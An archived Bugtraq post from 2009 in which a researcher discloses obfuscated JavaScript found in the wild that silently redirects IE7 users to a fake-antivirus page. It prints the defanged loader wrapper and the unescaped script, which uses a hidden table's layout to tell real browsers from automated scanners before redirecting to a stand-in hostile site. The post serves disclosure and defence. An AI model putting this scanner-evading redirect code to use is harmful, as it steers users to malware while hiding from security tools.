lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 11 Aug 2009 10:48:58 -0400
From: "James C. Slora Jr." <james.slora@...a.com>
To: <bugtraq@...urityfocus.com>
Subject: IE7 Script

Code found in the wild opens and renders hostile fakeav page on another
site without warning on fully updated IE7 on XP SP2 or XP SP3 32-bit
with current patches. Under IE8, user gets a warning before the hostile
site gets rendered. No warning under IE7. AV also failed to catch the
secondary hostile page until after rendering was complete. AV client
involved was outdated engine with current definitions, and not worth
maligning. Not tested with modern AV.

Not sure what if anything is new about this, but the obfuscation and the
client behavior suggest something of interest. The point seems to be to
render known bad code from a page that robot testers will find to be
clean, and possibly to bypass AV auto-protection.

The exploit was obfuscated javascript. VirusTotal had no complaints
about the script below, whether obfuscated or not.

Here is the script wrapper. I changed script to sXXcript.

<sXXcript type="text/javascript">
document.write( unescape( 'hex for the code below' ) );
</sXXcript>

Nothing at all interesting about the wrapper that I see.

Here is the unescaped child script. I changed the target site name,
which was a different domain from the one where this script was found.


<sXXcript language="javascript">
document.write('<div style="overflow:auto; height: 1px; width:
600px;">');
document.write('<table width="100%">');
document.write('<tr>');
document.write('<td id="first">This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('</tr>');
document.write('<tr>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td>This is good site</td>');
document.write('<td id="second">This is good site</td>');
document.write('</tr>');
document.write('</table>');
document.write('</div>');

var D=document;

function AbsPos(O, Parent){
var X=0, Y=0, Next, D=document;

Next=O;
if (Parent==null) Parent=D;
while (Next!=null && Next!==Parent){
Y+=Next.offsetTop; X+=Next.offsetLeft; Next=Next.offsetParent;
}
return [X, Y];
}

window.onfocus = function() {
	var first = AbsPos(D.getElementById('first'));
	var second = AbsPos(D.getElementById('second'));

	if (first[0] != second[0]) {
		document.location.href = "http://badsite.bad";
	}
}

</sXXcript>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ